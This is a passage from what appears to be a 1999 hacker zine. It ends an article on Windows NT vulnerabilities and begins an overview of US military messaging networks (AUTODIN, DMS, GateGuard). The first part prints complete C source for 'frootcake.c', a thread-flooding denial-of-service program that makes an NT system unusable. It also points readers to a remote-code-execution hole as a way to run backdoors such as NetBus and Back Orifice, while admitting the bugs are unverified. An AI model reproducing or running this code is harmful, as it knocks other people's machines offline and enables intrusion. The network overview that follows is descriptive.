nice little vulnerability that runs a large number of threads can crash it, and you won't be able to bring up the task manager. Here is the code: /* * frootcake.c * kiva@wookey.org * * this tests NT at coping with *really dodgy* code... * it totally brings my SMP box to being unusable (SP5) */ #include #include void poobah(); DWORD WINAPI thread_func (LPVOID lpv) { DWORD id; HANDLE h; BOOL success = 1; h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id); while (success){ switch (GetThreadPriority (h)){ case THREAD_PRIORITY_ABOVE_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_BELOW_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_HIGHEST: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_IDLE: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_LOWEST: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; } } poobah(); return 0; } void poobah() { DWORD id; HANDLE h; h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id); SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); poobah(); } int main () { printf ("frootcake - kiva@wookey.org\n"); poobah(); return 0; } --- As you always know, i like to save the best 'til last. Probably the most serious hole found recently is a whole that affects 90% of windows servers on the net, and allows you to execute code remotely. This is a VERY serious whole that can allow you to run any program you like, including netbus and back orafice. got to: http://www.eeye.com/database/advisories/ad06081999/ ad06081999-exploit.html for more info --- Thats all for now. All these bugs aren't garrenteed to work, i haven't varified most of them so don't come bitching when they don't -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ DoD - DMS/AUTODIN ]::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]:::: -->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]::::::::::::: Government/Military Defense Telecommunications Systems. [AUTODIN] [DMS] [DSN] [DAASC DDN] [CSP] June 1999 by hybrid [ http://hybrid.dtmf.org hybrid@dtmf.org ] ------------------------------------------------------- HI. This is a small article designed to be an introduction to the AUTODIN, DMS and surrounding DSN government networks. It is not intended as a definitive guide, I have only listed a few of many networks, it is more focused on the summerisations and definitions of these networks :) So why write an article on this subject?, Well basically I personaly find the networks featured in this article very interesting, in the sense that I'm curious as to why and how there where implemented and/or integrated with the networks that exist today. I am in no way interested in gaining access to any of these networks, All I have done here is done a little research through the means of http, and news articles. About this article.. In respect of the information sources of this article, any parts I have copied, or used as an example are enclosed in speech marks (") or begun and ended within a --- line. ALL of the information in this article has been obtained from public domain resources, to find out more about the systems and networks covered in this brief article, see the http links at the end of the file. Thanks for reading this, hope you enjoy the article.. A U T O D I N ************* DoD Automatic Digital Network (AUTODIN) The AUTODIN digital network is a worldwide data communications network of the Defense Communications System, and the US Department of Defense. It is currently being upgraded and phased out by newer networks such as the DSN (Defence Switched Network) and the Inter-Service/Agency Automated Message Proccessing Exchange (I-S/A AMPE). This article will begin by focusing in on the AUTODIN network, then progress to describe and summerise the more contempory networks such as AMPE and the DSN. Currently the entire AUTODIN network is being replaced mainly by the Defence Messaging System (DMS), again I will discuss these networks in more detail after we've taken a look at AUTODIN as you will provide better understanding of the newer networks. The AUTODIN network is operated and maintained by the Defense Information System Agency (DISA). The network is colosal in size and spans the globe, and is intended for secret computer-controlled communications for the DoD, and other Federal linked organisations and entitys. The whole system works on a multi-level security platform, and operates using digital store and message forwarding switching technolgys. Other majour government and military entitys that use the AUTODIN network include the NSA (National Security Agency), the DIA (Defense Intelligence Agency), and other well known organisations such as NATO. Obviously the bodies that use the AUTODIN network for secure communications can be very secretive, so the entire network was designed to be extreamly secure with its user access levels. An external penetration of this network would prove to be extreamly damaging to the the privacy of the concerned government entitys, so it has been quite difficult to obtain raw technical specifications of this network. "National security could be affected if classified messages are not delivered on secure lines in a timely manner." The AUTODIN network can be accessed many ways, but primarily via the use of a terminal called 'GateGuard'. GateGaurd operates on a desktop or laptop computer, and is usually installed on AUTODIN subscriber premises. Origionaly the AUTODIN network had to have human couriers to carry messages between organisations by hand, now the GateGuard software does all that. The system is designed to be an electronic gateway between the AUTODIN network and the local phone office automation system (OAS). The idea is that no sensitive messages or data can be lost during there travels through the OAS center. At the moment, the gateway software is being used by many AUTODIN linked entitys such as the Navy, the Army, Air Force Marine Corps, FAA, The Coast Guard, and the DNA. The software is very versatile, but at the same time extreamly secure. It enables users of the network to load the software onto there own terminals, or laptops and then connect there STU III's (via the PSTN) directly to the AUTODIN interface, essentialy forming a portable AUTODIN terminal. The portable terminals can be linked to the AUTODIN network via standard phone lines, cellualr lines, or via IMMARSAT (A Satelite network). If you are like me you are probably thinking 'hey, this cant be secure..' wrong: It appears that this kind of link is very secure, do you really think the DoD would use non-secure phone lines as direct links to AUTODIN?.. To get around this security flaw, the AUTODIN terminal system is operated by a TCC telecommunications center, and links to and from the TCC implement strong encryption techniqes such as KG Key Generators. Of course, all phone/data networks need switches and routers, so the AUTODIN network is controled and routed by a system called ASC (The AUTODIN Switching Center). The system is one of the prim